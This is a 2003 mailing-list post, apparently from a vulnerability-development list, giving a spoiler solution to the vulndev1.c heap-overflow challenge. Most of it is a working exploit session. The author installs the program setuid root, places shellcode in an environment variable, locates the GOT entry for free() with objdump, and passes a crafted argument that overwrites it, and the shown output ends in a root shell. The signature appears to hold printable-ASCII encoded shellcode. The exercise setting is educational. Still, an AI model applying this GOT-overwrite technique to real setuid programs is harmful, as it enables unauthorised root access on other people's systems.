Re: vulndev1.c solution (warning SPOILER)

From: Kenji Cronos <matrix(at)phiral.com>
Date: Thu May 15 2003 - 12:35:27 EDT

On Wed, 14 May 2003 16:48:33 -0700
"Cameron Brown" <cameron@greyzone.com> wrote:

> Jon,
>
> I don't know about yours, but my version of free() (glibc-2.2.93)

Yup, you're right.. I tried doing the same thing on different system and ran into that problem... had to put a jump in there.. I guess I just got lucky on my laptop the first time.. also, when exploiting on the command line.. \x0c can screw things up since it's the form feed character.. so here I just jumped over a little bit more..

matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c
matrix@overdose vuln-dev $ sudo chown root.root vuln1
matrix@overdose vuln-dev $ sudo chmod +s vuln1
matrix@overdose vuln-dev $ export SMEGMA=`printf "\xeb\x0e"`AAAAAAAAAAAAAAAAAA`cat shell`
matrix@overdose vuln-dev $ echo 'main(){printf("%p\n",getenv("SMEGMA"));}'>q.c;gcc -o q.ert q.c;./q.ert;rm q.*

0xbffffa04
matrix@overdose vuln-dev $ objdump -R ./vuln1 | grep free 080495f8 R_386_JUMP_SLOT free
matrix@overdose vuln-dev $ pcalc 0xf8-12

        236 0xec 0y11101100 matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x253;'` `printf "\xec\x95\x04\x08\x04\xfa\xff\xbf";` sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio) sh-2.05b#

-- 
%JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-
application/pgp-signature attachment: stored
Received on Thu May 15 13:31:33 2003